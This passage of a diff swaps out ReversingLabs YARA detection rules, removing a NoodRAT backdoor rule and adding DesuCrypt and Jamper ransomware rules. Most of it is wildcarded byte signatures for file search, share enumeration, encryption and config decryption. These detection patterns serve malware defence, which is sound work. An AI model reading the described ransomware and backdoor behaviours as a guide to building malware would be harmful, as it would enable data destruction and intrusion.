-            8B 74 24 ?? 48 8D 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B C8 E8 ?? ?? ?? ?? 48 8B D8 48
-            85 C0 75 ?? 48 8D 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B C8 E8 ?? ?? ?? ?? 48 8B D8 48
-            8D 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B D0 48 8B CB FF 15 ?? ?? ?? ?? 48 85 C0 74 ??
-            4C 8D 4C 24 ?? 48 89 7C 24 ?? 45 8B C6 48 8B D6 49 8B CC FF D0 85 C0 74 ?? 39 7C 24
-            ?? 0F 87 ?? ?? ?? ?? BF ?? ?? ?? ?? 4C 8B 7C 24 ?? 48 8D 4C 24 ?? 44 8B F7 E8 ?? ??
-            ?? ?? 4D 85 E4 74 ?? 49 83 FC ?? 74 ?? 48 8D 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B C8
-            E8 ?? ?? ?? ?? 48 8B F8 48 85 C0 75 ?? 48 8D 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B C8
-            E8 ?? ?? ?? ?? 48 8B F8 48 8D 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B D0 48 8B CF E8 ??
-            ?? ?? ?? 41 8B FE 48 85 C0 74 ?? 49 8B CC FF D0 4D 85 FF 74 ?? FF 15 ?? ?? ?? ?? 4D
-            8B C7 33 D2 48 8B C8 FF 15 ?? ?? ?? ?? 4C 8B BC 24 ?? ?? ?? ?? 4C 8B B4 24 ?? ?? ??
-            ?? 4C 8B AC 24 ?? ?? ?? ?? 4C 8B A4 24 ?? ?? ?? ?? 48 8B 9C 24 ?? ?? ?? ?? 48 85 F6
-            74 ?? FF 15 ?? ?? ?? ?? 4C 8B C6 33 D2 48 8B C8 FF 15 ?? ?? ?? ?? 8B C7 48 8B 8D ??
-            ?? ?? ?? 48 33 CC E8 ?? ?? ?? ?? 48 81 C4 ?? ?? ?? ?? 5F 5E 5D C3
+		$encrypt_files_p2 = {
+            50 E8 ?? ?? ?? ?? 6A ?? 5F 89 7D ?? 8B 85 ?? ?? ?? ?? 8B 40 ?? C7 84 05 ?? ?? ?? ??
+            ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B 48 ?? 51 8D 41 ?? 89 84 0D ?? ?? ?? ?? 8D 8D ?? ??
+            ?? ?? E8 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 68 ?? ?? ?? ?? C6 45 ?? ??
+            E8 ?? ?? ?? ?? C6 45 ?? ?? 8B C8 C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 8D 8D ?? ??
+            ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 8D 85 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 51 0F 43 85
+            ?? ?? ?? ?? 51 50 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ??
+            8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 39 B5 ?? ?? ?? ?? 74 ?? 83 7D ?? ?? 8D
+            55 ?? FF 75 ?? 0F 43 55 ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 59 8D 8D ?? ?? ?? ?? E8
+            ?? ?? ?? ?? 85 C0 75 ?? 8B 85 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 56 8B 40 ?? 03 C8 8B 51
+            ?? 83 CA ?? 8B C2 0B C7 39 71 ?? 0F 44 D0 52 E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ??
+            ?? ?? ?? 8D 85 ?? ?? ?? ?? C6 45 ?? ?? 50 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? E8 ?? ?? ??
+            ?? 59 8D 4D ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? C3
         }
 
 	condition:
-		uint16( 0 ) == 0x5A4D and ( all of ( $decrypt_configuration_p* ) ) and ( $decryption_algorithm ) and ( all of ( $request_access_token_p* ) ) and ( all of ( $network_communication_p* ) ) and ( all of ( $download_data_from_c2_p* ) )
+		uint16( 0 ) == 0x5A4D and ( $enum_rsrc ) and ( all of ( $search_files_p* ) ) and ( all of ( $create_test_file_p* ) ) and ( all of ( $encrypt_files_p* ) )
 }
-rule REVERSINGLABS_Linux_Backdoor_Noodrat : TC_DETECTION MALICIOUS MALWARE FILE
+rule REVERSINGLABS_Win32_Ransomware_Desucrypt : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Yara rule that detects NoodRAT backdoor."
+		description = "Yara rule that detects DesuCrypt ransomware."
 		author = "ReversingLabs"
-		id = "ac5eae27-dc42-5060-b639-c23c0bbabb50"
-		date = "2024-08-26"
-		modified = "2024-08-26"
+		id = "b9b3ce2b-f184-5bfa-8e1c-a7b996ac708a"
+		date = "2020-06-26"
+		modified = "2020-07-15"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/backdoor/Linux.Backdoor.NoodRAT.yara#L1-L162"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Win32.Ransomware.DesuCrypt.yara#L1-L93"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "2ec4a8ba7428054edb4dcdb6a00015b9758badf515f2c210bb946ba5402674d2"
+		logic_hash = "bd3ba8ea0fc16aad859a73628d0eda180d49298162fe239acf81c7c4e371eaad"
 		score = 75
 		quality = 90
 		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
 		category = "MALWARE"
-		tc_detection_type = "Backdoor"
-		tc_detection_name = "NoodRAT"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "DesuCrypt"
 		tc_detection_factor = 5
 		importance = 25
 
 	strings:
-		$change_name_on_system_p1 = {
-            41 56 41 55 41 54 55 53 48 81 EC ?? ?? ?? ?? 48 89 FB 48 8D BC 24 ?? ?? ?? ?? B8 ??
-            ?? ?? ?? B9 ?? ?? ?? ?? F3 48 AB 48 8D BC 24 ?? ?? ?? ?? B1 ?? F3 48 AB C6 84 24 ??
-            ?? ?? ?? ?? C6 84 24 ?? ?? ?? ?? ?? C6 84 24 ?? ?? ?? ?? ?? C6 84 24 ?? ?? ?? ?? ??
-            C6 84 24 ?? ?? ?? ?? ?? C6 84 24 ?? ?? ?? ?? ?? C6 84 24 ?? ?? ?? ?? ?? C6 84 24 ??
-            ?? ?? ?? ?? 80 3D ?? ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 48 8D AC 24 ?? ?? ?? ?? 0F B7 15
-            ?? ?? ?? ?? 66 89 55 ?? 4C 8D 65 ?? 0F B7 D2 BE ?? ?? ?? ?? 4C 89 E7 E8 ?? ?? ?? ??
-            48 8D 94 24 ?? ?? ?? ?? 0F B7 75 ?? 4C 89 E7 E8 ?? ?? ?? ?? 48 8D AC 24 ?? ?? ?? ??
-            4C 89 E6 48 89 EF E8 ?? ?? ?? ?? 4C 8B 03 48 C7 C6 ?? ?? ?? ?? 4C 89 C7 B8 ?? ?? ??
-            ?? 48 89 F1 F2 AE 48 F7 D1 48 8D 14 31 48 89 EF 48 89 F1 F2 AE 48 89 CE 48 F7 D6 48
-            83 EE ?? 48 39 F2 72 ?? BE ?? ?? ?? ?? 4C 89 C7 E8 ?? ?? ?? ?? 48 89 EE 48 8B 3B E8
-            ?? ?? ?? ?? B8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 48 8D BC 24 ?? ?? ?? ?? B8 ?? ?? ?? ?? B9
-            ?? ?? ?? ?? F3 48 AB 48 8D BC 24 ?? ?? ?? ?? B1 ?? F3 48 AB C6 84 24 ?? ?? ?? ?? ??
-            C6 84 24 ?? ?? ?? ?? ?? C6 84 24 ?? ?? ?? ?? ?? C6 84 24 ?? ?? ?? ?? ?? C6 84 24 ??
-            ?? ?? ?? ?? C6 84 24 ?? ?? ?? ?? ?? C6 84 24 ?? ?? ?? ?? ?? C6 84 24 ?? ?? ?? ?? ??
-            C6 84 24 ?? ?? ?? ?? ?? C6 84 24 ?? ?? ?? ?? ?? C6 84 24 ?? ?? ?? ?? ?? C6 84 24 ??
-            ?? ?? ?? ?? C6 84 24 ?? ?? ?? ?? ?? C6 84 24 ?? ?? ?? ?? ?? C6 84 24 ?? ?? ?? ?? ??
-            C6 84 24 ?? ?? ?? ?? ?? C6 84 24 ?? ?? ?? ?? ?? C6 84 24 ?? ?? ?? ?? ?? C6 84 24 ??
-            ?? ?? ?? ?? C6 84 24 ?? ?? ?? ?? ?? C6 84 24 ?? ?? ?? ?? ?? 48 8D B4 24 ?? ?? ?? ??
-            48 8D BC 24 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 89 C2 B8 ?? ?? ?? ?? 48 85
-            D2 0F 8E ?? ?? ?? ?? 48 C7 C2 ?? ?? ?? ?? 48 8D BC 24 ?? ?? ?? ?? 48 89 D1 F2 AE 48
+		$find_files = {
+            8B FF 55 8B EC 51 8B 4D ?? 8D 51 ?? 8A 01 41 84 C0 75 ?? 57 8B 7D ?? 2B CA 8B C7 41
+            F7 D0 89 4D ?? 3B C8 76 ?? 6A ?? 58 EB ?? 53 56 8D 5F ?? 03 D9 6A ?? 53 E8 ?? ?? ??
+            ?? 8B F0 59 59 85 FF 74 ?? 57 FF 75 ?? 53 56 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? FF
+            75 ?? 2B DF 8D 04 3E FF 75 ?? 53 50 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? 8B 5D ?? 8B
+            CB E8 ?? ?? ?? ?? 33 FF 89 45 ?? 85 C0 74 ?? 56 E8 ?? ?? ?? ?? 8B 75 ?? 59 EB ?? 8B
+            43 ?? 89 30 8B F7 83 43 ?? ?? 57 E8 ?? ?? ?? ?? 59 8B C6 5E 5B 5F 8B E5 5D C3 33 FF
+            57 57 57 57 57 E8 ?? ?? ?? ?? CC 8B FF 55 8B EC 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? 33
+            C5 89 45 ?? 8B 4D ?? 53 8B 5D ?? 57 8B 7D ?? 89 9D ?? ?? ?? ?? EB ?? 8A 01 3C ?? 74
+            ?? 3C ?? 74 ?? 3C ?? 74 ?? 51 57 E8 ?? ?? ?? ?? 59 59 8B C8 3B CF 75 ?? 8A 11 80 FA
+            ?? 75 ?? 8D 47 ?? 3B C8 74 ?? 53 33 DB 53 53 57 E8 ?? ?? ?? ?? 83 C4 ?? EB ?? 33 DB
+            80 FA ?? 74 ?? 80 FA ?? 74 ?? 8A C3 80 FA ?? 75 ?? B0 ?? 0F B6 C0 2B CF 41 F7 D8 56
+            1B C0 23 C1 68 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 53 50 E8 ?? ?? ?? ??
+            83 C4 ?? 8D 85 ?? ?? ?? ?? 53 53 53 50 53 57 FF 15 ?? ?? ?? ?? 8B F0 8B 85 ?? ?? ??
+            ?? 83 FE ?? 75 ?? 50 53 53 57 E8 ?? ?? ?? ?? 83 C4 ?? 8B D8 83 FE ?? 74 ?? 56 FF 15
+            ?? ?? ?? ?? 8B C3 5E 8B 4D ?? 5F 33 CD 5B E8 ?? ?? ?? ?? 8B E5 5D C3 8B 48 ?? 2B 08
+            C1 F9 ?? 89 8D ?? ?? ?? ?? 80 BD ?? ?? ?? ?? ?? 75 ?? 8A 8D ?? ?? ?? ?? 84 C9 74 ??
+            80 F9 ?? 75 ?? 38 9D ?? ?? ?? ?? 74 ?? 50 FF B5 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 57 50
+            E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? 8D 85 ?? ?? ?? ?? 50 56 FF 15 ?? ?? ?? ?? 85 C0
+            8B 85 ?? ?? ?? ?? 75 ?? 8B 10 8B 40 ?? 8B 8D ?? ?? ?? ?? 2B C2 C1 F8 ?? 3B C8 0F 84
+            ?? ?? ?? ?? 68 ?? ?? ?? ?? 2B C1 6A ?? 50 8D 04 8A 50 E8 ?? ?? ?? ?? 83 C4 ?? E9
         }
-		$change_name_on_system_p2 = {
-            89 CB 48 8D BC 24 ?? ?? ?? ?? 48 89 D1 F2 AE F7 D3 8D 5C 0B ?? 85 DB B8 ?? ?? ?? ??
-            0F 4E D8 48 8D B4 24 ?? ?? ?? ?? 48 8D AC 24 ?? ?? ?? ?? 48 89 EF E8 ?? ?? ?? ?? 48
-            89 EF B8 ?? ?? ?? ?? 48 C7 C1 ?? ?? ?? ?? F2 AE 48 F7 D1 48 8D 79 ?? 48 63 D3 48 63
-            FF 48 8D 7C 3D ?? BE ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 84 24 ?? ?? ?? ?? ?? C6 84 24 ??
-            ?? ?? ?? ?? C6 84 24 ?? ?? ?? ?? ?? C6 84 24 ?? ?? ?? ?? ?? C6 84 24 ?? ?? ?? ?? ??
-            C6 84 24 ?? ?? ?? ?? ?? 48 8D B4 24 ?? ?? ?? ?? 48 89 EF E8 ?? ?? ?? ?? 49 89 C6 48
-            8D B4 24 ?? ?? ?? ?? 48 8D BC 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 89 C3 48 89 E7 B9 ??
-            ?? ?? ?? B8 ?? ?? ?? ?? F3 48 AB C6 07 ?? 48 89 E5 41 BC ?? ?? ?? ?? 41 BD ?? ?? ??
-            ?? EB ?? 48 89 EF 4C 89 E9 4C 89 E0 F3 48 AB C6 07 ?? 48 89 D9 BA ?? ?? ?? ?? BE ??
-            ?? ?? ?? 48 89 E7 E8 ?? ?? ?? ?? 85 C0 7E ?? 48 63 D0 4C 89 F1 BE ?? ?? ?? ?? 48 89
-            E7 E8 ?? ?? ?? ?? 48 89 DF E8 ?? ?? ?? ?? 85 C0 74 ?? 48 89 DF E8 ?? ?? ?? ?? 4C 89
-            F7 E8 ?? ?? ?? ?? 48 8D BC 24 ?? ?? ?? ?? BE ?? ?? ?? ?? E8 ?? ?? ?? ?? E8 ?? ?? ??
-            ?? 85 C0 75 ?? 48 8D BC 24 ?? ?? ?? ?? 48 89 BC 24 ?? ?? ?? ?? 48 C7 84 24 ?? ?? ??
-            ?? ?? ?? ?? ?? 48 8D B4 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? B8 ?? ?? ?? ?? EB ?? 85 C0 7E
-            ?? BF ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8D BC 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? BF ?? ?? ??
-            ?? E8 ?? ?? ?? ?? B8 ?? ?? ?? ?? 48 81 C4 ?? ?? ?? ?? 5B 5D 41 5C 41 5D 41 5E C3
+		$encrypt_files = {
+            55 8B EC 83 E4 ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C4 89 84 24 ?? ??
+            ?? ?? 53 56 57 8B D9 89 54 24 ?? B9 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? BE ?? ?? ??
+            ?? C7 44 24 ?? ?? ?? ?? ?? 8D 7C 24 ?? C7 44 24 ?? ?? ?? ?? ?? F3 A5 6A ?? 6A ?? 8D
+            44 24 ?? 50 8D 84 24 ?? ?? ?? ?? 66 A5 50 6A ?? 6A ?? 8D 44 24 ?? 50 FF 15 ?? ?? ??
+            ?? 85 C0 75 ?? FF 15 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? 6A ?? E8 ?? ?? ?? ?? 83 C4 ?? 50
+            E8 ?? ?? ?? ?? 83 C4 ?? 33 C0 5F 5E 5B 8B 8C 24 ?? ?? ?? ?? 33 CC E8 ?? ?? ?? ?? 8B
+            E5 5D C3 8D 44 24 ?? 50 8D 44 24 ?? 50 6A ?? 68 ?? ?? ?? ?? FF 74 24 ?? 8D 84 24 ??
+            ?? ?? ?? 50 6A ?? 6A ?? FF 15 ?? ?? ?? ?? 85 C0 75 ?? FF 15 ?? ?? ?? ?? 50 68 ?? ??
+            ?? ?? EB ?? 68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 8D 44 24 ?? 50 FF 15 ?? ?? ??
+            ?? 85 C0 75 ?? FF 15 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 33 C0 5F
+            5E 5B 8B 8C 24 ?? ?? ?? ?? 33 CC E8 ?? ?? ?? ?? 8B E5 5D C3 8D 44 24 ?? 50 FF 74 24
+            ?? 6A ?? FF 74 24 ?? FF 15 ?? ?? ?? ?? 85 C0 75 ?? FF 15 ?? ?? ?? ?? 50 68 ?? ?? ??
+            ?? E9 ?? ?? ?? ?? 8B 43 ?? 8B 3D ?? ?? ?? ?? 50 89 44 24 ?? 89 44 24 ?? 8D 44 24 ??
+            50 6A ?? 6A ?? 6A ?? 6A ?? FF 74 24 ?? FF D7 85 C0 75 ?? FF 15 ?? ?? ?? ?? 50 51 BA
+            ?? ?? ?? ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 8B C8 E8 ?? ?? ?? ?? 50 E8 ?? ??
+            ?? ?? 83 C4 ?? 33 C0 5F 5E 5B 8B 8C 24 ?? ?? ?? ?? 33 CC E8 ?? ?? ?? ?? 8B E5 5D C3
+            FF 74 24 ?? E8 ?? ?? ?? ?? 83 C4 ?? 8B F0 FF 74 24 ?? 6A ?? 56 E8 ?? ?? ?? ?? 83 C4
+            ?? 83 7B ?? ?? 72 ?? 8B 1B FF 74 24 ?? 53 56 E8 ?? ?? ?? ?? 83 C4 ?? 8D 44 24 ?? FF
+            74 24 ?? 50 56 6A ?? 6A ?? 6A ?? FF 74 24 ?? FF D7 85 C0 0F 84 ?? ?? ?? ?? 8B 4C 24
+            ?? 8B 44 24 ?? 5F 89 01 8B C6 8B 8C 24 ?? ?? ?? ?? 5E 5B 33 CC E8 ?? ?? ?? ?? 8B E5
+            5D C3
         }
-		$decrypt_configuration_p1 = {
-            41 57 41 56 41 55 41 54 55 53 48 81 EC ?? ?? ?? ?? 48 89 7C 24 ?? 48 8D 9C 24 ?? ??
-            ?? ?? B8 ?? ?? ?? ?? B9 ?? ?? ?? ?? 48 89 DF F3 48 AB C6 07 ?? 48 8D 54 24 ?? B1 ??
-            48 89 D7 F3 48 AB C6 44 24 ?? ?? C6 44 24 ?? ?? C6 44 24 ?? ?? C6 44 24 ?? ?? C6 44
-            24 ?? ?? C6 44 24 ?? ?? C6 44 24 ?? ?? C6 44 24 ?? ?? 48 8D 54 24 ?? 0F B7 35 ?? ??
-            ?? ?? BF ?? ?? ?? ?? E8 ?? ?? ?? ?? BF ?? ?? ?? ?? B8 ?? ?? ?? ?? 48 C7 C1 ?? ?? ??
-            ?? F2 AE 48 F7 D1 48 83 E9 ?? 48 81 F9 ?? ?? ?? ?? BA ?? ?? ?? ?? 48 0F 46 D1 BE ??
-            ?? ?? ?? 48 89 DF E8 ?? ?? ?? ?? C6 44 24 ?? ?? C6 44 24 ?? ?? 48 8D 74 24 ?? 48 89
-            DF E8 ?? ?? ?? ?? 48 85 C0 0F 84 ?? ?? ?? ?? 48 8D 50 ?? 48 89 54 24 ?? C6 00 ?? 48
-            8D 74 24 ?? 48 89 D7 E8 ?? ?? ?? ?? 48 85 C0 0F 84 ?? ?? ?? ?? 48 8D 48 ?? 48 89 4C
-            24 ?? C6 00 ?? 48 8D 74 24 ?? 48 89 CF E8 ?? ?? ?? ?? 48 89 44 24 ?? 48 85 C0 0F 84
-            ?? ?? ?? ?? C6 00 ?? 48 8D B4 24 ?? ?? ?? ?? 48 C7 C5 ?? ?? ?? ?? 48 89 F7 41 BC ??
-            ?? ?? ?? 48 89 E9 44 89 E0 F2 AE 48 F7 D1 48 01 E9 48 8D 5C 24 ?? 48 81 F9 ?? ?? ??
-            ?? BA ?? ?? ?? ?? 48 0F 46 D1 48 89 DF E8 ?? ?? ?? ?? 48 89 DF 48 89 E9 44 89 E0 F2
-            AE 48 89 CD 48 F7 D5 83 ED ?? 8D 45 ?? 48 98 80 7C 04 ?? ?? 74 ?? 48 63 C5 C6 44 04
-            ?? ?? 83 C5 ?? 48 63 ED C6 44 2C ?? ?? 4C 8D 6C 24 ?? 4C 89 EB BD ?? ?? ?? ?? C7 44
-            24 ?? ?? ?? ?? ?? 66 C7 44 24 ?? ?? ?? 41 BC ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7
-            44 24 ?? ?? ?? ?? ?? 49 C7 C6 ?? ?? ?? ?? 4D 89 EF E9 ?? ?? ?? ?? 0F B6 03 3C ?? 75
-            ?? 44 8B 64 24 ?? 4D 6B E4 ?? 4C 03 64 24 ?? 49 8D 7C 24 ?? 83 7C 24 ?? ?? BA ?? ??
-            ?? ?? 0F 4E 54 24 ?? 48 63 D2 8B 74 24 ?? 48 8D 44 24 ?? 48 8D 34 30 E8
+		$enum_shares = {
+            55 8B EC 6A ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 83 EC ?? A1 ?? ?? ?? ?? 33 C5 89
+            45 ?? 53 56 57 50 8D 45 ?? 64 A3 ?? ?? ?? ?? 8B F1 89 75 ?? 8B 45 ?? 8D 4D ?? 51 50
+            6A ?? 6A ?? 6A ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0
+            0F 85 ?? ?? ?? ?? FF 75 ?? 6A ?? FF 15 ?? ?? ?? ?? 8B F8 89 7D ?? 85 FF 0F 84 ?? ??
+            ?? ?? 8D 45 ?? 50 57 8D 45 ?? 50 FF 75 ?? FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ??
+            0F 1F 40 ?? 33 DB 39 5D ?? 0F 8E ?? ?? ?? ?? 83 C7 ?? 66 90 F7 47 ?? ?? ?? ?? ?? 74
+            ?? 8D 47 ?? 89 45 ?? 8B 06 8B 48 ?? 85 C9 0F 84 ?? ?? ?? ?? 8B 01 8D 55 ?? 52 FF 50
+            ?? E9 ?? ?? ?? ?? 8B 17 33 C0 66 89 45 ?? 8B C2 C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ??
+            ?? ?? 8D 70 ?? 66 8B 08 83 C0 ?? 66 85 C9 75 ?? 2B C6 D1 F8 83 F8 ?? 77 ?? 8D 34 00
+            89 45 ?? 56 52 8D 45 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 33 C0 66 89 44 35 ?? EB ?? 52 C6
+            45 ?? ?? 8D 4D ?? FF 75 ?? 50 E8 ?? ?? ?? ?? 8B 75 ?? 8D 45 ?? C7 45 ?? ?? ?? ?? ??
+            50 8B 4E ?? E8 ?? ?? ?? ?? 8D 4D ?? C7 45 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 43 83 C7 ??
+            3B 5D ?? 0F 8C ?? ?? ?? ?? 8B 7D ?? 8D 45 ?? C7 45 ?? ?? ?? ?? ?? 50 57 8D 45 ?? C7
+            45 ?? ?? ?? ?? ?? 50 FF 75 ?? FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 57 FF 15 ??
+            ?? ?? ?? FF 75 ?? FF 15 ?? ?? ?? ?? 8B 4D ?? 64 89 0D ?? ?? ?? ?? 59 5F 5E 5B 8B 4D
+            ?? 33 CD E8 ?? ?? ?? ?? 8B E5 5D C2
         }
-		$decrypt_configuration_p2 = {
-            0F B7 54 24 ?? 66 41 89 54 24 ?? 83 44 24 ?? ?? 83 7C 24 ?? ?? 77 ?? 89 6C 24 ?? 41
-            BC ?? ?? ?? ?? EB ?? 3C ?? 75 ?? 48 8D 7B ?? BA ?? ?? ?? ?? BE ?? ?? ?? ?? E8 ?? ??
-            ?? ?? 66 89 44 24 ?? 44 89 64 24 ?? EB ?? 41 83 C4 ?? 83 C5 ?? 48 83 C3 ?? 4C 89 F1
-            4C 89 FF B8 ?? ?? ?? ?? F2 AE 48 F7 D1 48 83 E9 ?? 48 89 D8 4C 29 E8 48 39 C8 0F 82
-            ?? ?? ?? ?? 8B 4C 24 ?? 48 8B 54 24 ?? 89 8A ?? ?? ?? ?? 48 8D 5C 24 ?? B9 ?? ?? ??
-            ?? B8 ?? ?? ?? ?? 48 89 DF F3 48 AB 48 8B 7C 24 ?? 48 C7 C1 ?? ?? ?? ?? F2 AE 48 F7
-            D1 48 8D 51 ?? 48 8B 74 24 ?? 48 89 DF E8 ?? ?? ?? ?? 80 7C 24 ?? ?? 75 ?? 48 8B 44
-            24 ?? C6 80 ?? ?? ?? ?? ?? 80 7C 24 ?? ?? 75 ?? 48 8B 54 24 ?? C6 82 ?? ?? ?? ?? ??
-            80 7C 24 ?? ?? 75 ?? 48 8B 4C 24 ?? C6 81 ?? ?? ?? ?? ?? 80 7C 24 ?? ?? 75 ?? 48 8B
-            44 24 ?? C6 80 ?? ?? ?? ?? ?? 80 7C 24 ?? ?? 75 ?? 48 8B 54 24 ?? C6 82 ?? ?? ?? ??
-            ?? 80 7C 24 ?? ?? 75 ?? 48 8B 4C 24 ?? C6 81 ?? ?? ?? ?? ?? 80 7C 24 ?? ?? 75 ?? 48
-            8B 44 24 ?? C6 80 ?? ?? ?? ?? ?? 48 8D 5C 24 ?? B9 ?? ?? ?? ?? B8 ?? ?? ?? ?? 48 89
-            DF F3 48 AB 48 8B 7C 24 ?? 48 C7 C1 ?? ?? ?? ?? F2 AE 48 F7 D1 48 83 E9 ?? 48 81 F9
-            ?? ?? ?? ?? BA ?? ?? ?? ?? 48 0F 46 D1 48 8B 74 24 ?? 48 89 DF E8 ?? ?? ?? ?? C6 44
-            24 ?? ?? C6 44 24 ?? ?? 48 8D 74 24 ?? 48 89 DF E8 ?? ?? ?? ?? 48 85 C0 0F 84 ?? ??
-            ?? ?? 48 8D 7C 24 ?? B8 ?? ?? ?? ?? 48 C7 C1 ?? ?? ?? ?? F2 AE 48 F7 D1 83 E9 ?? 8D
+
+	condition:
+		uint16( 0 ) == 0x5A4D and ( $find_files and $encrypt_files and $enum_shares )
+}
+rule REVERSINGLABS_Win32_Ransomware_Jamper : TC_DETECTION MALICIOUS MALWARE FILE
+{
+	meta:
+		description = "Yara rule that detects Jamper ransomware."
+		author = "ReversingLabs"
+		id = "9ba9358e-8f67-5d0e-a9bc-b3b10cd3a8b2"
+		date = "2020-06-26"
+		modified = "2020-07-15"
+		reference = "ReversingLabs"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Win32.Ransomware.Jamper.yara#L1-L110"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
+		logic_hash = "826f8fa7cc92b279c609a9ab6a87c32940e37b4c2476854af75bbed29cb3eaf2"
+		score = 75
+		quality = 90
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		status = "RELEASED"
+		sharing = "TLP:WHITE"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "Jamper"
+		tc_detection_factor = 5
+		importance = 25
+
+	strings:
+		$encrypt_files_p1 = {
+            55 8B EC 81 C4 ?? ?? ?? ?? 53 56 57 33 C9 89 8D ?? ?? ?? ?? 89 8D ?? ?? ?? ?? 89 8D
+            ?? ?? ?? ?? 89 8D ?? ?? ?? ?? 89 4D ?? 89 4D ?? 89 4D ?? 89 4D ?? 89 4D ?? 89 55 ??
+            89 45 ?? 8D 45 ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ??
+            33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 33 DB 8D 8D ?? ?? ?? ?? BA ?? ?? ?? ?? 8B
+            45 ?? E8 ?? ?? ?? ?? 8B B5 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 8B 85 ??
+            ?? ?? ?? 89 85 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 89
+            85 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 89 85 ?? ?? ??
+            ?? 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? 8B 45 ?? E8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ??
+            8B 45 ?? E8 ?? ?? ?? ?? 84 C0 0F 85 ?? ?? ?? ?? 6A ?? 8B 4D ?? B2 ?? A1 ?? ?? ?? ??
+            E8 ?? ?? ?? ?? 89 45 ?? 8B 45 ?? 8B 10 FF 12 89 85 ?? ?? ?? ?? 89 95 ?? ?? ?? ?? 83
+            BD ?? ?? ?? ?? ?? 75 ?? 83 BD ?? ?? ?? ?? ?? 0F 86 ?? ?? ?? ?? EB ?? 0F 8E ?? ?? ??
+            ?? 83 BD ?? ?? ?? ?? ?? 75 ?? 81 BD ?? ?? ?? ?? ?? ?? ?? ?? 76 ?? EB ?? 7E ?? C7 85
+            ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? EB ?? 8B 85 ?? ?? ?? ?? 89 85
